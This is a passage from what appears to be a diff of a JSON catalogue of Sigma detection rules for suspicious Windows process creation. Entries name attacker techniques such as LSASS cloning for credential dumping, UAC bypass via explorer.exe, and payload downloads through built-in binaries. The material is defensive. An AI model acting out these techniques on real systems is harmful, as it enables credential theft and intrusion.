"Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "uuid": "534f2ef7-e8a2-4433-816d-c91bccde289b", + "value": "Explorer NOUACCHECK Flag", + "meta": { + "refs": [ + "https://twitter.com/ORCA6665/status/1496478087244095491", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_nouaccheck.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548.002" + ], + "creation_date": "2022/02/23", + "filename": "proc_creation_win_susp_explorer_nouaccheck.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Domain Controller User Logon", + "Unknown how many legitimate software products use that method" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", + "uuid": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", + "value": "Suspicious File Characteristics Due to Missing Fields", + "meta": { + "refs": [ + "https://securelist.com/muddywater/88059/", + "https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_characteristics.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.006" + ], + "creation_date": "2018/11/22", + "filename": "proc_creation_win_susp_file_characteristics.yml", + "author": "Markus Neis, Sander Wiebing", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", + "uuid": "eee00933-a761-4cd0-be70-c42fe91731e7", + "value": 
"GfxDownloadWrapper.exe Downloads File from Suspicious URL", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/GfxDownloadWrapper/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_download_via_gfxdownloadwrapper.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2020/10/09", + "filename": "proc_creation_win_susp_file_download_via_gfxdownloadwrapper.yml", + "author": "Victor Sergeev, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).", + "uuid": "37db85d1-b089-490a-a59a-c7b6f984f480", + "value": "Suspicious Findstr 385201 Execution", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_findstr_385201.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518.001" + ], + "creation_date": "2021/12/16", + "filename": "proc_creation_win_susp_findstr_385201.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", + "uuid": "33339be3-148b-4e16-af56-ad16ec6c7e7b", + "value": "Findstr Launching .lnk File", + "meta": { + "refs": [ + "https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_findstr_lnk.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1202", + "attack.t1027.003" + ], + "creation_date": "2020/05/01", + "filename": "proc_creation_win_susp_findstr_lnk.yml", + "author": "Trent Liffick", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", + "uuid": "af491bca-e752-4b44-9c86-df5680533dbc", + "value": "Finger.exe Suspicious Invocation", + "meta": { + "refs": [ + "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12", + "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/", + "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2021/02/24", + "filename": "proc_creation_win_susp_finger_usage.yml", + "author": "Florian Roth, omkar72, oscd.community", + "level": "high", + "falsepositive": [ + "Admin activity (unclear what they do nowadays with finger.exe)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", + "uuid": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "value": "Format.com FileSystem LOLBIN", + "meta": { + "refs": [ + "https://twitter.com/0gtweet/status/1477925112561209344", + "https://twitter.com/wdormann/status/1478011052130459653?s=20", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_format.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/01/04", + "filename": "proc_creation_win_susp_format.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", + "uuid": "add64136-62e5-48ea-807e-88638d02df1e", + "value": "Fsutil Suspicious Invocation", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md", + "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ], + "creation_date": "2019/09/26", + "filename": "proc_creation_win_susp_fsutil_usage.yml", + "author": "Ecco, E.M. 
Anhaus, oscd.community", + "level": "high", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", + "uuid": "e56d3073-83ff-4021-90fe-c658e0709e72", + "value": "Gpresult Display Group Policy Information", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult", + "https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gpresult.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1615" + ], + "creation_date": "2022/05/01", + "filename": "proc_creation_win_susp_gpresult.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of a scheduled task with a GUID like name", + "uuid": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", + "value": "Suspicious Scheduled Task Name As GUID", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_guid_task_name.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ], + "creation_date": "2022/10/31", + 
"filename": "proc_creation_win_susp_guid_task_name.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate software naming their tasks as GUIDs" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "uuid": "0a4f6091-223b-41f6-8743-f322ec84930b", + "value": "Suspicious GUP Usage", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2019/02/06", + "filename": "proc_creation_win_susp_gup.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", + "uuid": "44143844-0631-49ab-97a0-96387d6b2d7c", + "value": "Download Files Using Notepad++ GUP Utility", + "meta": { + "refs": [ + "https://twitter.com/nas_bench/status/1535322182863179776", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/06/10", + "filename": "proc_creation_win_susp_gup_download.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Other parent processes other than notepad++ using GUP that are not currently identified" + ], + "logsource.category": "process_creation", + 
"logsource.product": "windows" + } + }, + { + "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", + "uuid": "d65aee4d-2292-4cea-b832-83accd6cfa43", + "value": "Execute Arbitrary Binaries Using GUP Utility", + "meta": { + "refs": [ + "https://twitter.com/nas_bench/status/1535322445439180803", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/06/10", + "filename": "proc_creation_win_susp_gup_execution.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Other parent binaries using GUP not currently identified" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Use of hostname to get information", + "uuid": "7be5fb68-f9ef-476d-8b51-0256ebece19e", + "value": "Suspicious Execution of Hostname", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/hostname", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_hostname.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ], + "creation_date": "2022/01/01", + "filename": "proc_creation_win_susp_hostname.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", + "uuid": "043c4b8b-3a54-4780-9682-081cb6b8185c", + "value": "Suspicious IIS Module Registration", + "meta": { + "refs": [ + 
"https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iis_module_registration.yml" + ], + "tags": "No established tags", + "creation_date": "2022/08/04", + "filename": "proc_creation_win_susp_iis_module_registration.yml", + "author": "Florian Roth (rule), Microsoft (idea)", + "level": "high", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", + "uuid": "71158e3f-df67-472b-930e-7d287acaa3e1", + "value": "Execution Of Non-Existing File", + "meta": { + "refs": [ + "https://pentestlaboratories.com/2021/12/08/process-ghosting/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2021/12/09", + "filename": "proc_creation_win_susp_image_missing.yml", + "author": "Max Altgelt", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", + "uuid": "d042284c-a296-4988-9be5-f424fadcc28c", + "value": "Suspicious Execution of InstallUtil Without Log", + "meta": { + "refs": [ + "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", + "https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_instalutil.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + 
"creation_date": "2022/01/23", + "filename": "proc_creation_win_susp_instalutil.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "uuid": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "value": "Suspicious Invoke-WebRequest Usage", + "meta": { + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/08/02", + "filename": "proc_creation_win_susp_invoke_webrequest_download.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious IIS native-code module installations via command line", + "uuid": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", + "value": "IIS Native-Code Module Command Line Installation", + "meta": { + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", + "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iss_module_install.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2019/12/11", + "filename": "proc_creation_win_susp_iss_module_install.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown as 
it may vary from organisation to organisation how admins use to install IIS modules" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the rare use of the command line tool shutdown to logoff a user", + "uuid": "ec290c06-9b6b-4338-8b6b-095c0f284f10", + "value": "Suspicious Execution of Shutdown to Log Out", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_logoff.yml" + ], + "tags": [ + "attack.impact", + "attack.t1529" + ], + "creation_date": "2022/10/01", + "filename": "proc_creation_win_susp_logoff.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Wscript or Cscript executing from a drive other than C. 
This has been observed with Qakbot executing from within a mounted ISO file.", + "uuid": "5b80cf53-3a46-4adc-960b-05ec19348d74", + "value": "Wscript Execution from Non C Drive", + "meta": { + "refs": [ + "https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt", + "https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lolbin_non_c_drive.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/10/01", + "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml", + "author": "Aaron Herman", + "level": "medium", + "falsepositive": [ + "Legitimate applications installed on other partitions such as \"D:\"" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious LSASS process process clone that could be a sign of process dumping activity", + "uuid": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", + "value": "Suspicious LSASS Process Clone", + "meta": { + "refs": [ + "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", + "https://twitter.com/Hexacorn/status/1420053502554951689", + "https://twitter.com/SBousseaden/status/1464566846594691073?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1003.001" + ], + "creation_date": "2021/11/27", + "filename": "proc_creation_win_susp_lsass_clone.yml", + "author": "Florian Roth, Samir Bousseaden", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Use of reg to get MachineGuid information", + "uuid": "f5240972-3938-4e56-8e4b-e33893176c1f", + "value": "Suspicious Query of MachineGUID", + "meta": { + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-8---windows-machineguid-discovery", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_machineguid.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ], + "creation_date": "2022/01/01", + "filename": "proc_creation_win_susp_machineguid.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", + "uuid": "c27515df-97a9-4162-8a60-dc0eeb51b775", + "value": "Suspicious Microsoft OneNote Child Process", + "meta": { + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_microsoft_onenote_child_process.yml" + ], + "tags": [ + "attack.t1566", + "attack.t1566.001", + "attack.initial_access" + ], + "creation_date": "2022/10/21", + "filename": "proc_creation_win_susp_microsoft_onenote_child_process.yml", + "author": "Tim Rauch (rule), Elastic (idea)", + "level": "medium", + "falsepositive": [ + "File located in the AppData folder with trusted signature" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", + "uuid": "a16980c2-0c56-4de0-9a79-17971979efdd", + "value": "Missing Space Characters in Command Lines", 
+ "meta": { + "refs": [ + "https://twitter.com/cyb3rops/status/1562072617552678912", + "https://ss64.com/nt/cmd.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_missing_spaces.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/08/23", + "filename": "proc_creation_win_susp_missing_spaces.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", + "uuid": "1dd05363-104e-4b4a-b963-196a534b03a1", + "value": "Suspicious Mofcomp Execution", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml", + "https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ], + "creation_date": "2022/07/12", + "filename": "proc_creation_win_susp_mofcomp_execution.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when when a mounted share is removed. 
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", + "uuid": "cb7c4a03-2871-43c0-9bbb-18bbdb079896", + "value": "Mounted Share Deleted", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mounted_share_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.005" + ], + "creation_date": "2020/10/08", + "filename": "proc_creation_win_susp_mounted_share_deletion.yml", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "level": "low", + "falsepositive": [ + "Administrators or Power users may remove their shares via cmd line" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", + "uuid": "729ce0ea-5d8f-4769-9762-e35de441586d", + "value": "MpiExec Lolbin", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1465058133303246867", + "https://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mpiexec_lolbin.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/01/11", + "filename": "proc_creation_win_susp_mpiexec_lolbin.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", + "uuid": "33be4333-2c6b-44f4-ae28-102cdbde0a31", + "value": "Suspicious Msbuild 
Execution By Uncommon Parent Process", + "meta": { + "refs": [ + "https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/", + "https://www.echotrail.io/insights/search/msbuild.exe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msbuild.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/11/17", + "filename": "proc_creation_win_susp_msbuild.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", + "uuid": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", + "value": "MSHTA Suspicious Execution 01", + "meta": { + "refs": [ + "http://blog.sevagas.com/?Hacking-around-HTA-files", + "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356", + "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script", + "https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997", + "https://twitter.com/mattifestation/status/1326228491302563846", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.t1218.005", + "attack.execution", + "attack.t1059.007", + "cve.2020.1599" + ], + "creation_date": "2019/02/22", + "filename": "proc_creation_win_susp_mshta_execution.yml", + "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", + "level": "high", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious mshta 
process patterns", + "uuid": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", + "value": "Suspicious MSHTA Process Patterns", + "meta": { + "refs": [ + "https://en.wikipedia.org/wiki/HTML_Application", + "https://www.echotrail.io/insights/search/mshta.exe", + "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106" + ], + "creation_date": "2021/07/17", + "filename": "proc_creation_win_susp_mshta_pattern.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", + "uuid": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", + "value": "Mshtml DLL RunHTMLApplication Abuse", + "meta": { + "refs": [ + "https://twitter.com/n1nj4sec/status/1421190238081277959", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshtml_runhtmlapplication.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/08/14", + "filename": "proc_creation_win_susp_mshtml_runhtmlapplication.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of msiexec from an uncommon directory", + "uuid": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "value": "Suspicious MsiExec Directory", + "meta": { + "refs": [ + "https://twitter.com/200_okay_/status/1194765831911215104", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msiexec_cwd.yml" + ], + 
"tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ], + "creation_date": "2019/11/14", + "filename": "proc_creation_win_susp_msiexec_cwd.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious msiexec process starts with web addresses as parameter", + "uuid": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", + "value": "MsiExec Web Install", + "meta": { + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msiexec_web_install.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007", + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2018/02/09", + "filename": "proc_creation_win_susp_msiexec_web_install.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Downloads payload from remote server", + "uuid": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "value": "Malicious Payload Download via Office Binaries", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/", + "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191", + "Reegun J (OCBC Bank)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msoffice.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2019/10/26", + "filename": "proc_creation_win_susp_msoffice.yml", + "author": "Beyu Denis, oscd.community", + 
"level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "uuid": "0e4164da-94bc-450d-a7be-a4b176179f1f", + "value": "Suspicious Netsh Discovery Command", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_discovery_command.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016" + ], + "creation_date": "2021/12/07", + "filename": "proc_creation_win_susp_netsh_discovery_command.yml", + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "level": "low", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects persitence via netsh helper", + "uuid": "56321594-9087-49d9-bf10-524fe8479452", + "value": "Suspicious Netsh DLL Persistence", + "meta": { + "refs": [ + 